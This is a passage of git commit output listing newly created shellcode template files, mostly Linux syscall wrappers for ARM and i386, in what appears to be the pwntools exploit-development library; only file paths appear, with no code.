pwnlib/shellcraft/templates/arm/linux/connect.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/dir.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/dup.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/echo.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/epoll_ctl.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/epoll_pwait.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/execve.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/exit.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fork.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/forkbomb.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/forkexit.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fstat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fstat64.asm create mode 100644 
pwnlib/shellcraft/templates/arm/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ftruncate.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getdents.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getgroups.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getitimer.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getpeername.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getpgrp.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getppid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getsid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getuid.asm create mode 100644 
pwnlib/shellcraft/templates/arm/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/iopl.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/killparent.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/listen.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/lseek.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mincore.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mmap.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mq_timedreceive.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mremap.asm create mode 100644 
pwnlib/shellcraft/templates/arm/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/munlockall.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/pause.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ppoll.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ptrace.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/putpmsg.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/readlink.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/readv.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/recvfrom.asm create mode 100644 
pwnlib/shellcraft/templates/arm/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/remap_file_pages.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/renameat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_getparam.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_setscheduler.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setgid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setitimer.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setregid.asm create mode 100644 
pwnlib/shellcraft/templates/arm/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setresuid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setreuid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setsockopt.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setsockopt_timeout.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sigaltstack.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/splice.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/symlink.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sync.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/tee.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/timer_create.asm create mode 100644 
pwnlib/shellcraft/templates/arm/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/timer_gettime.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/uname.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/utimensat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/utimes.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/vfork.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/vhangup.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/vmsplice.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/wait4.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/waitid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/waitpid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/write.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/writev.asm create mode 100644 pwnlib/shellcraft/templates/arm/memcpy.asm create mode 100644 pwnlib/shellcraft/templates/arm/setregs.asm create mode 100644 pwnlib/shellcraft/templates/arm/udiv_10.asm create mode 100644 pwnlib/shellcraft/templates/arm/xor.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/__doc__ create mode 100644 
pwnlib/shellcraft/templates/i386/cgc/allocate.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/cat.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/deallocate.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/fdwait.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/random.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/receive.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/syscall.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/terminate.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/transmit.asm create mode 100644 pwnlib/shellcraft/templates/i386/crash.asm create mode 100644 pwnlib/shellcraft/templates/i386/epilog.asm create mode 100644 pwnlib/shellcraft/templates/i386/function.asm create mode 100644 pwnlib/shellcraft/templates/i386/getpc.asm create mode 100644 pwnlib/shellcraft/templates/i386/itoa.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/accept.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/access.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/chmod.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/chroot.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/clock_settime.asm create mode 100644 
pwnlib/shellcraft/templates/i386/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/close.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/dir.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/dupio.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/egghunter.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/epoll_ctl.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/epoll_pwait.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/execve.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fork.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/forkbomb.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/forkexit.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fstat.asm create mode 100644 
pwnlib/shellcraft/templates/i386/linux/fstat64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ftruncate.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getgroups.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getitimer.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getpeername.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getpgrp.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getppid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getsid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getuid.asm create mode 100644 
pwnlib/shellcraft/templates/i386/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/iopl.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/killparent.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/listen.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/loader.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/loader_append.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/lseek.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mincore.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mmap.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mq_timedreceive.asm create mode 100644 
pwnlib/shellcraft/templates/i386/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mremap.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/munlockall.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pause.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pidmax.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ppoll.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ptrace.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/putpmsg.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/readlink.asm 
create mode 100644 pwnlib/shellcraft/templates/i386/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/readn.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/readv.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/recvfrom.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/remap_file_pages.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/renameat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_getparam.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_setscheduler.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setgid.asm create mode 100644 
pwnlib/shellcraft/templates/i386/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setitimer.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setresuid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setsockopt.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setsockopt_timeout.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sigaltstack.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/socket.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/socketcall.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/splice.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/stage.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/symlink.asm create mode 100644 
pwnlib/shellcraft/templates/i386/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sync.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/tee.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/timer_create.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/timer_gettime.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/uname.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/utimensat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/utimes.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/vfork.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/vhangup.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/vmsplice.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/wait4.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/waitid.asm create mode 100644 
